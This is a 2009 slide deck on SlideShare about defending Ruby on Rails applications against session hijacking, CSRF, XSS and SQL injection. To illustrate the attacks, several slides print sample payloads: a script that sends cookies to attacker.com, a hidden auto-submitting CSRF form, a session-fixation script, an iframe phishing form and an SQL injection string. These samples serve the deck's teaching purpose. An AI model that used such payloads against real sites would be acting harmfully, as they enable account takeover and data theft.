Defending Against Attacks  With Rails <ul><li>Tony Amoyal </li></ul><ul><li>Web Application Consultant </li></ul><ul><li>w...
General Principles <ul><li>Kerckhoff's Principle – Always assume the method of security is known </li></ul><ul><li>Always ...
Authentication <ul><li>Step 1:  </li></ul><ul><li>One-way hash all passwords </li></ul><ul><li>MD5  ->  128-bit hash value...
Why isn’t hashing enough? <ul><li>Same passwords hash to same value  </li></ul><ul><li>->  Attacker can easily determine i...
Use Salt <ul><li>Ensures same password will hash to different values </li></ul><ul><li>Rainbow tables are useless, attacke...
People Use Crappy Passwords <ul><li>20 common passwords from MySpace phishing attack: </li></ul><ul><li>password1, abc123,...
Restful Authentication <ul><li>Great way to implement authentication in Rails </li></ul><ul><li>Easy setup with hashes and...
What Else Can We Do? <ul><li>It is difficult to protect accounts with bad passwords </li></ul><ul><li>Always provide a pas...
Mass Assignment <ul><li>Rails let's us do stuff like… </li></ul><ul><li>Not secure if we have attributes like is_admin bec...
Solve By Whitelisting <ul><li>For previous example: </li></ul><ul><li>Can also use attr_protected to Blacklist </li></ul>
Accessing Records
Logging <ul><li>Tell Rails not to log sensitive data </li></ul>
Security Through Obscurity? <ul><li>My default server response header: </li></ul><ul><li>“ Apache/2.2.11 (Unix) mod_ssl/2....
More Obscurity? <ul><li>Turn your server signature off </li></ul><ul><li>Add this to the bottom of your Apache conf: </li>...
Stack Traces <ul><li>Rails handles this but good to know about </li></ul><ul><li>config/environments/development.rb </li><...
Time For The Scary Stuff...
Session Hijacking <ul><li>How does it work? </li></ul><ul><li>Session ID's are stored on client machines </li></ul><ul><li...
How Does Attacker Get SID? <ul><li>1) Guess the Session ID </li></ul><ul><li>2) Network sniffing </li></ul><ul><li>3) Find...
Guessing the Session ID <ul><li>Rails makes this very difficult by making Session ID's very random </li></ul><ul><li>SID's...
Sniffing the Session ID <ul><li>Possible on an unencrypted wireless LAN  </li></ul><ul><li>( internet cafe ) </li></ul><ul...
Shared computer problem <ul><li>Consider public computers </li></ul><ul><li>Solution:  </li></ul><ul><li>Provide a logout ...
Cookie Security <ul><li>Rails uses CookieStore by default as of v2.2 </li></ul><ul><li>Can users tamper with the cookies? ...
Cookie Precautions <ul><li>Don't store in the session: </li></ul><ul><li>Sensitive Data </li></ul><ul><li>Cookie data is  ...
What is a Replay Attack? <ul><li>When a client presents an old cookie that is valid and convinces the server that it is cu...
Session Fixation <ul><li>1) Attacker gets a valid session </li></ul><ul><li>2) Attacker forces his victim to use valid ses...
Good Example from Wikipedia <ul><li>Given: </li></ul><ul><li>Alice has bank account at http://un.safe.ly </li></ul><ul><li...
The Attack <ul><li>1) Mallory knows the http://un.safe.ly accepts SID's from query strings </li></ul><ul><li>2) Mallory se...
Other Attacks <ul><li>You can also use XSS to set a victim's session ID </li></ul><ul><li><script> </li></ul><ul><li>docum...
Fixation Mitigation <ul><li>In Rails, one line of code: </li></ul><ul><li>reset_session </li></ul><ul><li>In last example,...
Restful Authentication Example <ul><li>app/controllers/sessions_controller.rb </li></ul><ul><li>Read about tradeoffs:  plu...
Cross-Site Request Forgery <ul><li>What is it? </li></ul><ul><li>Let's start with a great example from Rails Guides </li><...
CSRF Example <ul><li>1) Attacker posts on a message board </li></ul><ul><li><img src=&quot;http://www.webapp.com/project/1...
CSRF Mitigation <ul><li>1) Require POST methods where applicable </li></ul><ul><li>config/routes.rb </li></ul><ul><li>app/...
Automatic POST Request <ul><li><a href=&quot;http://www.harmless.com/&quot; onclick=&quot; var f = document.createElement(...
Another Security Measure <ul><li>2) Add a security token in forms </li></ul><ul><li>Rails automatically includes security ...
Cross-Site Scripting ( XSS ) <ul><li>Most Common </li></ul><ul><li>Most Devastating </li></ul><ul><li>510,000 Attacks </li...
The XSS Attack <ul><li>1) Attacker visits website and injects some code through web form or other means </li></ul><ul><li>...
The Possibilities <ul><li>Steal cookies </li></ul><ul><li>Hijack sessions </li></ul><ul><li>Redirect victim to malicious w...
XSS Example <ul><li>Getting cookie information </li></ul><ul><li><script>document.write('<img src=&quot;http://www.attacke...
Get User Credentials <ul><li>Use an iframe to present a form to be submitted to your server </li></ul><ul><li><iframe name...
XSS Mitigation <ul><li>1) Whitelist input filtering </li></ul><ul><li>Good reference: </li></ul><ul><li>http://apidock.com...
SQL Injection <ul><li>An attack that manipulates SQL queries performed by a web application on its database. </li></ul>
SQL Injection Example <ul><li>Given: My application has Reminder objects which belong to Band objects </li></ul><ul><li>Re...
SQL Injection Mitigation <ul><li>In Rails use </li></ul><ul><li>Reminder.find(:all, :conditions => [&quot;band_name = ?&qu...
But Obviously... <ul><li>Do this: </li></ul><ul><li>@reminders = @band.reminders </li></ul><ul><li>The previous tip works ...
Other Injections <ul><li>1) Ajax </li></ul><ul><li>Returning a string in Ajax call? Escape in controller </li></ul><ul><li...
More Injections <ul><li>4) Textile </li></ul><ul><li>Use whitelist filtering! </li></ul><ul><li>RedCloth.new(&quot;<a href...
Even More Injections <ul><li>6) Header </li></ul><ul><li>escape referer, user-agent, cookie, etc. if you display these hea...
Regular Expressions <ul><li>Use A and , not ^ and $ </li></ul><ul><li>The problem? </li></ul><ul><li>file.txt%0A<script>a...
Whitelist, Don't Blacklist <ul><li>before_filter :only => [...]  instead of  </li></ul><ul><li>before_filter :except => [....
Some Links <ul><li>http://guides.rubyonrails.org/security.html </li></ul><ul><li>http://en.wikipedia.org/wiki/Session_fixa...
Upcoming SlideShare
Loading in …5
×

Defending Against Attacks With Rails

2,939
-1

Published on

Let's face it, the web can be a dangerous place. So how do you protect your users and yourself? Tony Amoyal answers that and more as he shows how Rails can help protect against miscreants.

Published in: Technology, News & Politics
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
2,939
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
30
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Defending Against Attacks With Rails

  1. 1. Defending Against Attacks With Rails <ul><li>Tony Amoyal </li></ul><ul><li>Web Application Consultant </li></ul><ul><li>www.tonyamoyal.com </li></ul><ul><li>July 14, 2009 </li></ul>
  2. 2. General Principles <ul><li>Kerckhoff's Principle – Always assume the method of security is known </li></ul><ul><li>Always validate on the server side, even if you validate on the client side </li></ul><ul><li>Whitelist, don't Blacklist </li></ul>
  3. 3. Authentication <ul><li>Step 1: </li></ul><ul><li>One-way hash all passwords </li></ul><ul><li>MD5 -> 128-bit hash values ( 2^128 tries) </li></ul><ul><li>SHA -> 160-bit hash values (2^160 tries) </li></ul><ul><li>Secure? </li></ul>
  4. 4. Why isn’t hashing enough? <ul><li>Same passwords hash to same value </li></ul><ul><li>-> Attacker can easily determine if multiple users </li></ul><ul><li>have the same password </li></ul><ul><li>Very weak against Rainbow attack </li></ul>
  5. 5. Use Salt <ul><li>Ensures same password will hash to different values </li></ul><ul><li>Rainbow tables are useless, attacker would essentially have to compute a rainbow table for each password with the new salt </li></ul>
  6. 6. People Use Crappy Passwords <ul><li>20 common passwords from MySpace phishing attack: </li></ul><ul><li>password1, abc123, myspace1, password, blink182, </li></ul><ul><li>qwerty1, ****you, 123abc, baseball1, football1, </li></ul><ul><li>123456, soccer, monkey1, liverpool1, princess1, </li></ul><ul><li>jordan23, slipknot1, superman1, iloveyou1, monkey </li></ul><ul><li>( http://www.schneier.com/blog/archives/2006/12/realworld_passw.html ) </li></ul>
  7. 7. Restful Authentication <ul><li>Great way to implement authentication in Rails </li></ul><ul><li>Easy setup with hashes and salts </li></ul><ul><li>Extra protection for crappy passwords with SITE_KEY and stretching </li></ul>
  8. 8. What Else Can We Do? <ul><li>It is difficult to protect accounts with bad passwords </li></ul><ul><li>Always provide a password strength meter </li></ul><ul><li>Maybe only accept passwords at a certain strength level </li></ul>
  9. 9. Mass Assignment <ul><li>Rails let's us do stuff like… </li></ul><ul><li>Not secure if we have attributes like is_admin because an attacker can POST with… </li></ul>
  10. 10. Solve By Whitelisting <ul><li>For previous example: </li></ul><ul><li>Can also use attr_protected to Blacklist </li></ul>
  11. 11. Accessing Records
  12. 12. Logging <ul><li>Tell Rails not to log sensitive data </li></ul>
  13. 13. Security Through Obscurity? <ul><li>My default server response header: </li></ul><ul><li>“ Apache/2.2.11 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8g DAV/2 PHP/5.3.0 Phusion_Passenger/2.2.2” </li></ul><ul><li>Add this to your Apache conf: </li></ul><ul><li>ServerTokens Prod </li></ul><ul><li>-> New server response header: </li></ul><ul><li>“ Apache” </li></ul>
  14. 14. More Obscurity? <ul><li>Turn your server signature off </li></ul><ul><li>Add this to the bottom of your Apache conf: </li></ul><ul><li>ServerSignature Off </li></ul>
  15. 15. Stack Traces <ul><li>Rails handles this but good to know about </li></ul><ul><li>config/environments/development.rb </li></ul><ul><li>config/environments/production.rb </li></ul><ul><li>Want prod error message in dev? In app controller: </li></ul>
  16. 16. Time For The Scary Stuff...
  17. 17. Session Hijacking <ul><li>How does it work? </li></ul><ul><li>Session ID's are stored on client machines </li></ul><ul><li>1) Attacker gets SID from authenticated user </li></ul><ul><li>2) Attacker presents SID to web app as his own </li></ul>
  18. 18. How Does Attacker Get SID? <ul><li>1) Guess the Session ID </li></ul><ul><li>2) Network sniffing </li></ul><ul><li>3) Finding cookies on shared computer </li></ul><ul><li>4) Cross-site scripting (more on this later) </li></ul><ul><li>5) Session fixation (more on this later) </li></ul>
  19. 19. Guessing the Session ID <ul><li>Rails makes this very difficult by making Session ID's very random </li></ul><ul><li>SID's are hashes of string containing: </li></ul><ul><li>current time </li></ul><ul><li>random number between 0 and 1 </li></ul><ul><li>PID of ruby interpreter (another random number) </li></ul><ul><li>constant string </li></ul>
  20. 20. Sniffing the Session ID <ul><li>Possible on an unencrypted wireless LAN </li></ul><ul><li>( internet cafe ) </li></ul><ul><li>Solution: provide SSL connection </li></ul>
  21. 21. Shared computer problem <ul><li>Consider public computers </li></ul><ul><li>Solution: </li></ul><ul><li>Provide a logout button to clear the session </li></ul><ul><li>Good example – Bank Of America: </li></ul><ul><li>Provides a low session expiration time with pop-up warning </li></ul>
  22. 22. Cookie Security <ul><li>Rails uses CookieStore by default as of v2.2 </li></ul><ul><li>Can users tamper with the cookies? </li></ul><ul><li>Only if they have the secret key: </li></ul><ul><li>config/environment.rb </li></ul>
  23. 23. Cookie Precautions <ul><li>Don't store in the session: </li></ul><ul><li>Sensitive Data </li></ul><ul><li>Cookie data is not encrypted , it is base64 encoded ! -> clients can read cookies </li></ul><ul><li>Transient Data (account balance) </li></ul><ul><li>Vulnerable to replay attack...see next slide </li></ul><ul><li>Use a long secret key: 128 characters </li></ul>
  24. 24. What is a Replay Attack? <ul><li>When a client presents an old cookie that is valid and convinces the server that it is current </li></ul><ul><li>Use a nonce? …probably overkill </li></ul><ul><li>(if not, use memcached?) </li></ul><ul><li>Best solution: </li></ul><ul><li>Don't keep transient data that is sensitive (account balance) in the session </li></ul>
  25. 25. Session Fixation <ul><li>1) Attacker gets a valid session </li></ul><ul><li>2) Attacker forces his victim to use valid session </li></ul><ul><li>Now attacker has access to your session </li></ul>
  26. 26. Good Example from Wikipedia <ul><li>Given: </li></ul><ul><li>Alice has bank account at http://un.safe.ly </li></ul><ul><li>Mallory wants Alice's money </li></ul><ul><li>Alice has reasonable amount of trust in Mallory </li></ul>
  27. 27. The Attack <ul><li>1) Mallory knows the http://un.safe.ly accepts SID's from query strings </li></ul><ul><li>2) Mallory sends Alice an email </li></ul><ul><li>“ Check out this new cool bank feature http://un.safe.ly/?SID=GOTCHA” </li></ul><ul><li>3) Alice visits the link and logs in </li></ul><ul><li>4) Mallory visits the link and has access to Alice's account </li></ul>
  28. 28. Other Attacks <ul><li>You can also use XSS to set a victim's session ID </li></ul><ul><li><script> </li></ul><ul><li>document.cookie=&quot;_session_id=PUT_SID_HERE&quot;; </li></ul><ul><li></script> </li></ul><ul><li>OR </li></ul><ul><li><meta http-equiv=Set-Cookie content=&quot;_session_id=PUT_SID_HERE&quot;> </li></ul>
  29. 29. Fixation Mitigation <ul><li>In Rails, one line of code: </li></ul><ul><li>reset_session </li></ul><ul><li>In last example, Alice's session would have been reset upon login </li></ul><ul><li>The tradeoff? Forms will expire </li></ul><ul><li>(read more: vendor/plugins/restful_authentication/notes/Tradeoffs.txt ) </li></ul>
  30. 30. Restful Authentication Example <ul><li>app/controllers/sessions_controller.rb </li></ul><ul><li>Read about tradeoffs: plugins/restful_authentication/notes/Tradeoffs.txt </li></ul>
  31. 31. Cross-Site Request Forgery <ul><li>What is it? </li></ul><ul><li>Let's start with a great example from Rails Guides </li></ul>
  32. 32. CSRF Example <ul><li>1) Attacker posts on a message board </li></ul><ul><li><img src=&quot;http://www.webapp.com/project/1/destroy&quot;> </li></ul><ul><li>2) Bob recently used webapp.com, session still alive </li></ul><ul><li>3) Bob visits message board </li></ul><ul><li>4) Browser loads image, sending cookie from Bob's machine </li></ul><ul><li>5) webapp verifies cookie credentials and destroys project with ID=1 </li></ul><ul><li>6) No image displayed on forum </li></ul>
  33. 33. CSRF Mitigation <ul><li>1) Require POST methods where applicable </li></ul><ul><li>config/routes.rb </li></ul><ul><li>app/controllers/projects_controller.rb </li></ul><ul><li>Still not secure, POST requests can be sent automatically on events </li></ul>
  34. 34. Automatic POST Request <ul><li><a href=&quot;http://www.harmless.com/&quot; onclick=&quot; var f = document.createElement('form'); f.style.display = 'none'; this.parentNode.appendChild(f); f.method = 'POST'; f.action = 'http://www.example.com/account/destroy'; f.submit(); return false;&quot;>To the harmless survey</a> </li></ul><ul><li>OR </li></ul><ul><li><img src=&quot;http://www.harmless.com/img&quot; width=&quot;400&quot; height=&quot;400&quot; onmouseover=&quot;...&quot; /> </li></ul>
  35. 35. Another Security Measure <ul><li>2) Add a security token in forms </li></ul><ul><li>Rails automatically includes security tokens in forms </li></ul><ul><li>app/controllers/application_controller.rb </li></ul><ul><li>Use secret if not using the CookieStore </li></ul>
  36. 36. Cross-Site Scripting ( XSS ) <ul><li>Most Common </li></ul><ul><li>Most Devastating </li></ul><ul><li>510,000 Attacks </li></ul><ul><li>in April, 2008 </li></ul>
  37. 37. The XSS Attack <ul><li>1) Attacker visits website and injects some code through web form or other means </li></ul><ul><li>2) Web application saves injected code and displays it later to a victim </li></ul>
  38. 38. The Possibilities <ul><li>Steal cookies </li></ul><ul><li>Hijack sessions </li></ul><ul><li>Redirect victim to malicious website </li></ul><ul><li>Display advertisements to benefit attacker </li></ul><ul><li>Change elements on website to get credentials </li></ul><ul><li>Install malware through browser security holes </li></ul>
  39. 39. XSS Example <ul><li>Getting cookie information </li></ul><ul><li><script>document.write('<img src=&quot;http://www.attacker.com/' + document.cookie + '&quot;>');</script> </li></ul><ul><li>OR </li></ul><ul><li><img src=javascript:document.write('<img src=&quot;http://www.attacker.com/' + document.cookie + '&quot;>')> </li></ul><ul><li>OR </li></ul><ul><li><table background=&quot;...&quot;> </li></ul><ul><li>Now the attacker checks his server logs </li></ul>
  40. 40. Get User Credentials <ul><li>Use an iframe to present a form to be submitted to your server </li></ul><ul><li><iframe name=&quot;LoginForm&quot; src=&quot;http://58.xx.xxx.xxx&quot;></iframe> </li></ul>
  41. 41. XSS Mitigation <ul><li>1) Whitelist input filtering </li></ul><ul><li>Good reference: </li></ul><ul><li>http://apidock.com/rails/ActionView/Helpers/SanitizeHelper/sanitize </li></ul><ul><li>2) Escape all output of your application </li></ul><ul><li>In your views... </li></ul><ul><li><%=h user_input %> # done by default in Rails 3 </li></ul>
  42. 42. SQL Injection <ul><li>An attack that manipulates SQL queries performed by a web application on its database. </li></ul>
  43. 43. SQL Injection Example <ul><li>Given: My application has Reminder objects which belong to Band objects </li></ul><ul><li>Reminder.find(:all, </li></ul><ul><li>:conditions => &quot;band_name = '#{band_name}'&quot;) </li></ul><ul><li>What if an attacker enters for their band_name: </li></ul><ul><li>' OR 1=1 OR ' </li></ul><ul><li>Resulting SQL: </li></ul><ul><li>SELECT * FROM `reminders` WHERE (band_name = '' OR 1=1 OR '') </li></ul>
  44. 44. SQL Injection Mitigation <ul><li>In Rails use </li></ul><ul><li>Reminder.find(:all, :conditions => [&quot;band_name = ?&quot;, band_name]) </li></ul><ul><li>Resulting SQL: </li></ul><ul><li>SELECT * FROM `reminders` WHERE (band_name = '' OR 1=1 OR'') </li></ul><ul><li>', ”, NULL, and line breaks are escaped </li></ul><ul><li>-> Query returns nothing </li></ul>
  45. 45. But Obviously... <ul><li>Do this: </li></ul><ul><li>@reminders = @band.reminders </li></ul><ul><li>The previous tip works great for complicated custom queries </li></ul>
  46. 46. Other Injections <ul><li>1) Ajax </li></ul><ul><li>Returning a string in Ajax call? Escape in controller </li></ul><ul><li>2) RJS </li></ul><ul><li>escape_javascript() within JS and h() within HTML </li></ul><ul><li>3) CSS </li></ul><ul><li>Some browsers allow HTML/JS in CSS </li></ul><ul><li><div id=&quot;abc&quot; expr=&quot;alert('!!!')&quot; style=&quot;background:url('javascript:eval(document.all.abc.expr)')&quot;> </li></ul><ul><li>...works just like HTML/JS injection </li></ul>
  47. 47. More Injections <ul><li>4) Textile </li></ul><ul><li>Use whitelist filtering! </li></ul><ul><li>RedCloth.new(&quot;<a href='javascript:alert(1)'>hello</a>&quot;, [:filter_html]).to_html </li></ul><ul><li># => &quot;<p><a href=&quot;javascript:alert(1)&quot;>hello</a></p>&quot; </li></ul><ul><li>5) Command Line </li></ul><ul><li>system(&quot;/bin/echo&quot;,&quot;hello; rm *&quot;) </li></ul><ul><li># prints &quot;hello; rm *&quot; and does not delete files </li></ul>
  48. 48. Even More Injections <ul><li>6) Header </li></ul><ul><li>escape referer, user-agent, cookie, etc. if you display these headers on a page </li></ul><ul><li>be aware of how you build headers because injections can rewrite headers and inject arbitrary headers (up to Rails 2.1.2) </li></ul><ul><li>more in Rails Guides, section 8.9 </li></ul><ul><li>7) Encoding </li></ul><ul><li>Browser understands encoding, but your app does not therefore sanitize method is useless </li></ul>
  49. 49. Regular Expressions <ul><li>Use A and , not ^ and $ </li></ul><ul><li>The problem? </li></ul><ul><li>file.txt%0A<script>alert('hello')</script> </li></ul><ul><li>passes the test because %0A is a newline </li></ul><ul><li>Result: &quot;file.txt <script>alert('hello')</script>&quot; </li></ul>
  50. 50. Whitelist, Don't Blacklist <ul><li>before_filter :only => [...] instead of </li></ul><ul><li>before_filter :except => [...] </li></ul><ul><li>Use attr_accessible instead of attr_protected </li></ul><ul><li>Only allow certain tags when stripping instead of allowing all tags except </li></ul><ul><li>Don't try to correct user input </li></ul><ul><li>This will make the attack work: &quot;<sc<script>ript>&quot;.gsub(&quot;<script>&quot;, &quot;&quot;) </li></ul>
  51. 51. Some Links <ul><li>http://guides.rubyonrails.org/security.html </li></ul><ul><li>http://en.wikipedia.org/wiki/Session_fixation </li></ul><ul><li>http://www.rorsecurity.info/journal/2007/4/15/session-fixation-in-rails.html </li></ul><ul><li>http://github.com/technoweenie/restful-authentication/ </li></ul><ul><li>http://www.matasano.com/log/958/enough-with-the-rainbow-tables-what-you-need-to-know-about-secure-password-schemes/ </li></ul><ul><li>My Blog: www.tonyamoyal.com </li></ul>
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×